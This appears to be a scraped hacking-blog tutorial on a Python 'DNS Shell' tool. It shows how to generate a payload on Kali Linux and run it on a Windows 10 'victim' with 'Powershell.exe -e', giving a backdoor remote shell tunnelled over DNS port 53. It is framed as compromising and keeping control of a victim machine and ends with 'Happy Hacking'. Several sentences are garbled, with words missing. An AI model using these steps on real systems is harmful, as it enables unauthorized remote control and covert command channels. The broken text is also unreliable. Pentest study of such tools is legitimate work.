DNS Shell  - DNS Shell - DNS Shell – Tool to Compromise and Maintain control Over Victim Machine

 protocol runs on the layer of TCP/IP Model.When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination acts as the .DNS Tool is python based exploitation tool to and also maintaining the access via command and to the server.

Must Read Complete Kali Tools tutorials from Information gathering to Forensics

Here I have used Kali Linux(Attacker ) and Victim (Windows 10)

ATTACKER MACHINE

  • Download the DNS SHELL tool HERE
  • Execute the command: python DNS-SHELL.py

- Screenshot 420 copy - DNS Shell – Tool to Compromise and Maintain control Over Victim Machine

  • It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)

Generating Payload – DNS Shell

- Screenshot 421 copy - DNS Shell – Tool to Compromise and Maintain control Over Victim Machine

  • Above Figure is Recursive mode.
  • Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>

NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d

- Screenshot 422 copy - DNS Shell &#8211; Tool to Compromise and Maintain control Over Victim Machine

  • Above figure shows recursive mode has generated payload.

Victims Machine

  • Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>

- Screenshot 423 - DNS Shell &#8211; Tool to Compromise and Maintain control Over Victim Machine

BACK TO ATTACKERS MACHINE

  • Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.

- Screenshot 424 - DNS Shell &#8211; Tool to Compromise and Maintain control Over Victim Machine

  • Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.Happy Hacking !!!



Source link
Based Blockchain Network

LEAVE A REPLY

Please enter your comment!
Please enter your name here